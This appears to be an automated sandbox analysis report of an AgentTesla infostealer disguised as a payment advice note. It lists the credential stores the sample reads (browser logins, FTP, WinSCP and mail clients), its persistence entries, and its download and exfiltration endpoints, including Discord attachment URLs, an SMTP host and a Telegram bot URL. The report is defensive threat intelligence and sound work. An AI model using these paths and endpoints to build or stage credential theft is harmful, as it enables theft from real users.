                    Source: Yara matchFile source: 11.2.Owdpdrv.exe.4970000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Owdpdrv.exe.4970000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE.4ec0000.3.unpack, type: UNPACKEDPE
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)Show sources
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Tries to harvest and steal ftp login credentialsShow sources
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                    Tries to steal Mail credentials (via file access)Show sources
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\Desktop\USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 0000000B.00000002.934476385.0000000002607000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.933886627.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE PID: 4460, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Owdpdrv.exe PID: 4800, type: MEMORY

                    Remote Access Functionality:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 0000000B.00000002.932033702.00000000021F4000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.767263953.00000000004C1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.935842915.0000000004F00000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.935435728.0000000003471000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.933607178.0000000002400000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.934613196.0000000003531000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.934476385.0000000002607000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.933886627.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.933280290.0000000002234000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.935490984.0000000004970000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.694028712.00000000006BD000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.937725779.0000000004EC0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE PID: 4460, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Owdpdrv.exe PID: 4800, type: MEMORY
                    Source: Yara matchFile source: 11.2.Owdpdrv.exe.4f00000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE.4ec0000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE.2400000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE.2400000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Owdpdrv.exe.4f00000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Owdpdrv.exe.4970000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Owdpdrv.exe.4970000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE.4ec0000.3.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation211DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping2System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsNative API1Registry Run Keys / Startup Folder1Process Injection112Deobfuscate/Decode Files or Information1Credentials in Registry1Account Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsCommand and Scripting Interpreter2Logon Script (Windows)Registry Run Keys / Startup Folder1Obfuscated Files or Information2Security Account ManagerSystem Information Discovery125SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing21NTDSQuery Registry1Distributed Component Object ModelClipboard Data1Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSecurity Software Discovery241SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsVirtualization/Sandbox Evasion13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion13DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 321120 Sample: USD55,260.84_PAYMENT_ADVICE... Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 2 other signatures 2->51 6 USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE 1 16 2->6         started        11 Owdpdrv.exe 14 2->11         started        13 Owdpdrv.exe 14 2->13         started        process3 dnsIp4 23 cdn.discordapp.com 162.159.135.233, 443, 49734, 49747 CLOUDFLARENETUS United States 6->23 25 discord.com 162.159.138.232, 443, 49733, 49746 CLOUDFLARENETUS United States 6->25 21 C:\Users\user\AppData\Local\...\Owdpdrv.exe, PE32 6->21 dropped 53 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 6->53 55 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 6->55 57 Injects a PE file into a foreign processes 6->57 15 USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE 2 6->15         started        27 192.168.2.1 unknown unknown 11->27 59 Multi AV Scanner detection for dropped file 11->59 61 Detected unpacking (changes PE section rights) 11->61 63 Detected unpacking (overwrites its own PE header) 11->63 19 Owdpdrv.exe 2 11->19         started        29 162.159.133.233, 443, 49749 CLOUDFLARENETUS United States 13->29 31 162.159.136.232, 443, 49748 CLOUDFLARENETUS United States 13->31 file5 signatures6 process7 dnsIp8 33 suncurepelletmill.com 192.186.237.168, 49769, 587 AS-26496-GO-DADDY-COM-LLCUS United States 15->33 35 mail.suncurepelletmill.com 15->35 37 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->37 39 Tries to steal Mail credentials (via file access) 15->39 41 Tries to harvest and steal ftp login credentials 15->41 43 Tries to harvest and steal browser information (history, passwords, etc) 15->43 signatures9

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE26%VirustotalBrowse
                    USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE17%ReversingLabs

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\Owdpdrv.exe17%ReversingLabs

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    5.2.Owdpdrv.exe.2c50000.6.unpack100%AviraTR/Hijacker.GenDownload File
                    1.2.USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE.2df0000.5.unpack100%AviraTR/Hijacker.GenDownload File
                    1.2.USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE.2e90000.6.unpack100%AviraTR/Dropper.GenDownload File
                    5.2.Owdpdrv.exe.2cf0000.7.unpack100%AviraTR/Dropper.GenDownload File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://cdn.discordapp.c0%Avira URL Cloudsafe
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    http://suncurepelletmill.com0%Avira URL Cloudsafe
                    http://hHeaxI.com0%Avira URL Cloudsafe
                    https://discord.com/0%URL Reputationsafe
                    https://discord.com/0%URL Reputationsafe
                    https://discord.com/0%URL Reputationsafe
                    http://mail.suncurepelletmill.com0%Avira URL Cloudsafe
                    https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                    https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                    https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                    https://cdn.discorda0%Avira URL Cloudsafe
                    http://WuQXJFerpNu.net0%Avira URL Cloudsafe
                    https://cdn.disc80%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    discord.com
                    		162.159.138.232
                    		truefalse
                      		unknown
                      cdn.discordapp.com
                      		162.159.135.233
                      		truefalse
                        		high
                        suncurepelletmill.com
                        		192.186.237.168
                        		truetrue
                          		unknown
                          mail.suncurepelletmill.com
                          		unknown
                          		unknowntrue
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://cdn.discordapp.cUSD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000001.00000002.696849625.0000000002600000.00000004.00000001.sdmp, Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://cdn.discordapp.com/attachments/7784816176054Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                              		high
                              http://127.0.0.1:HTTP/1.1USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.933886627.0000000002471000.00000004.00000001.sdmp, Owdpdrv.exe, 0000000B.00000002.934476385.0000000002607000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              https://cdn.discordapp.com/attachments/778481617605492770/77Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                                		high
                                http://DynDns.comDynDNSOwdpdrv.exe, 0000000B.00000002.934476385.0000000002607000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://cdn.discordapp.com/attachments/778481617605492770/779193Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                                  		high
                                  https://cdn.discordapp.com/attachments/77848161760549277$Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                                    		high
                                    https://cdn.discordapp.com/attachments/778481617605492770/77919335445784Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                                      		high
                                      https://cdn.discordapp.com/attachments/77848Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                                        		high
                                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haUSD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.933886627.0000000002471000.00000004.00000001.sdmp, Owdpdrv.exe, 0000000B.00000002.934476385.0000000002607000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://cdn.discordapp.com/attachments/7Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                                          		high
                                          https://cdn.discordapp.com/attachments/7784816178Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                                            		high
                                            http://suncurepelletmill.comUSD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.934905842.00000000027C9000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://cdn.discordapp.com/attachments/778481617605492770/779193354457841664Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                                              		high
                                              http://hHeaxI.comOwdpdrv.exe, 0000000B.00000002.934476385.0000000002607000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://discord.com/Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://mail.suncurepelletmill.comUSD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.934905842.00000000027C9000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://cdn.discordapp.com/attachments/778481617605492770/7791933544Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                                                		high
                                                https://cdn.discordapp.com/attachmenOwdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://cdn.discordapp.com/aUSD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000001.00000002.696849625.0000000002600000.00000004.00000001.sdmp, Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://api.ipify.orgGETMozilla/5.0Owdpdrv.exe, 0000000B.00000002.934476385.0000000002607000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://cdn.discordapp.com/attac0Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://cdn.discordapp.com/attachments/778481617605492770/779193354457841664/OwdHOwdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://cdn.discordaUSD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000001.00000002.696849625.0000000002600000.00000004.00000001.sdmp, Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://WuQXJFerpNu.netUSD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.934877979.00000000027C3000.00000004.00000001.sdmp, USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000003.899170983.0000000005111000.00000004.00000001.sdmp, USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.933886627.0000000002471000.00000004.00000001.sdmp, USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.934934311.00000000027D1000.00000004.00000001.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://cdn.discordapp.com/attachments/778481617605492770/779193354457841664/OwdprrrOwdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------xUSD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000002.00000002.933886627.0000000002471000.00000004.00000001.sdmp, Owdpdrv.exe, 0000000B.00000002.934476385.0000000002607000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://cdn.disc8USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE, 00000001.00000002.696849625.0000000002600000.00000004.00000001.sdmp, Owdpdrv.exe, 00000005.00000002.784138611.0000000004050000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            162.159.136.232
                                                            		unknownUnited States
                                                            		13335CLOUDFLARENETUSfalse
                                                            162.159.138.232
                                                            		unknownUnited States
                                                            		13335CLOUDFLARENETUSfalse
                                                            192.186.237.168
                                                            		unknownUnited States
                                                            		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                            162.159.135.233
                                                            		unknownUnited States
                                                            		13335CLOUDFLARENETUSfalse
                                                            162.159.133.233
                                                            		unknownUnited States
                                                            		13335CLOUDFLARENETUSfalse

                                                            Private

                                                            IP
                                                            192.168.2.1

                                                            General Information

                                                            Joe Sandbox Version:31.0.0 Red Diamond
                                                            Analysis ID:321120
                                                            Start date:20.11.2020
                                                            Start time:11:25:44
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 12m 23s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Sample file name:USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:17
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@7/5@8/6
                                                            EGA Information:Failed
                                                            HDC Information:
                                                            • Successful, ratio: 8.9% (good quality ratio 8.5%)
                                                            • Quality average: 84.6%
                                                            • Quality standard deviation: 24.6%
                                                            HCA Information:
                                                            • Successful, ratio: 99%
                                                            • Number of executed functions: 71
                                                            • Number of non-executed functions: 42
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .EXE
                                                            Warnings:
                                                            Show All
                                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                            • Excluded IPs from analysis (whitelisted): 52.147.198.201, 51.104.144.132, 8.253.204.120, 8.248.117.254, 8.248.133.254, 8.248.119.254, 67.26.83.254, 52.155.217.156, 20.54.26.129, 95.101.22.134, 95.101.22.125, 51.104.139.180
                                                            • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            11:26:38API Interceptor692x Sleep call for process: USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE modified
                                                            11:26:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Owdp C:\Users\user\AppData\Local\pdwO.url
                                                            11:27:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Owdp C:\Users\user\AppData\Local\pdwO.url
                                                            11:27:05API Interceptor424x Sleep call for process: Owdpdrv.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            162.159.136.232NyUnwsFSCa.exeGet hashmaliciousBrowse
                                                              PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                                                D6vy84I7rJ.exeGet hashmaliciousBrowse
                                                                  LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exeGet hashmaliciousBrowse
                                                                    QgwtAnenic.exeGet hashmaliciousBrowse
                                                                      qclepSi8m5.exeGet hashmaliciousBrowse
                                                                        99GQMirv2r.exeGet hashmaliciousBrowse
                                                                          7w6Yl263sM.exeGet hashmaliciousBrowse
                                                                            8Ce3uRUjxv.exeGet hashmaliciousBrowse
                                                                              187QadygQl.exeGet hashmaliciousBrowse
                                                                                eybgvwBamW.exeGet hashmaliciousBrowse
                                                                                  R#U00d6SLER Puchase_tcs 10-28-2020,pdf.exeGet hashmaliciousBrowse
                                                                                    Payment of bank details,zip.exeGet hashmaliciousBrowse
                                                                                      Documentos_ordine.exeGet hashmaliciousBrowse
                                                                                        PO CBV87654468,pdf.exeGet hashmaliciousBrowse
                                                                                          Master Jurilia MV_PACIFIC_Grace TutiCorin.exeGet hashmaliciousBrowse
                                                                                            Bkrndbc_Signed_.exeGet hashmaliciousBrowse
                                                                                              PO102620.exeGet hashmaliciousBrowse
                                                                                                Ilpgivn_Signed_.exeGet hashmaliciousBrowse
                                                                                                  DHL PARCEL AWB 1222576549.exeGet hashmaliciousBrowse
                                                                                                    162.159.138.2329Pimjl3jyq.exeGet hashmaliciousBrowse
                                                                                                      RFQ for TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                                                        99GQMirv2r.exeGet hashmaliciousBrowse
                                                                                                          8Ce3uRUjxv.exeGet hashmaliciousBrowse
                                                                                                            NEW PO # 20001578.exeGet hashmaliciousBrowse
                                                                                                              HSBC-0914.exeGet hashmaliciousBrowse
                                                                                                                Payment of bank details,zip.exeGet hashmaliciousBrowse
                                                                                                                  PO CBV87654468,pdf.exeGet hashmaliciousBrowse
                                                                                                                    Master Jurilia MV_PACIFIC_Grace TutiCorin.exeGet hashmaliciousBrowse
                                                                                                                      Bkrndbc_Signed_.exeGet hashmaliciousBrowse
                                                                                                                        aFYqaxx4On.exeGet hashmaliciousBrowse
                                                                                                                          s8d5H0hJyx.exeGet hashmaliciousBrowse
                                                                                                                            DHL PARCEL AWB 1222576549.exeGet hashmaliciousBrowse
                                                                                                                              BREACHOFDATA.exeGet hashmaliciousBrowse
                                                                                                                                DHL_889887.exeGet hashmaliciousBrowse
                                                                                                                                  HSBC File.exeGet hashmaliciousBrowse
                                                                                                                                    Bank Receipt 23.10.exeGet hashmaliciousBrowse
                                                                                                                                      PROFORMA Updt NR.119220_REV_3 Copies IMG_00002892.exeGet hashmaliciousBrowse
                                                                                                                                        DHL_314142.exeGet hashmaliciousBrowse
                                                                                                                                          Policja.exeGet hashmaliciousBrowse
                                                                                                                                            192.186.237.168PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                                                                                                                              NEW ORDER po 21000491 from Ukraine.exeGet hashmaliciousBrowse
                                                                                                                                                162.159.135.233Teklif Rusya 24 09 2020.docGet hashmaliciousBrowse
                                                                                                                                                • cdn.discordapp.com/attachments/733818080668680222/758418625429372978/p2.jpg

                                                                                                                                                Domains

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                discord.comNyUnwsFSCa.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.232
                                                                                                                                                Fl0aIIH39W.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.138.232
                                                                                                                                                PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.232
                                                                                                                                                9Pimjl3jyq.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.138.232
                                                                                                                                                D6vy84I7rJ.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.135.232
                                                                                                                                                RFQ for TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.138.232
                                                                                                                                                Payment Confirmation NOV-85869983TGTTAS.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.128.233
                                                                                                                                                LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.159.137.232
                                                                                                                                                LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exeGet hashmaliciousBrowse
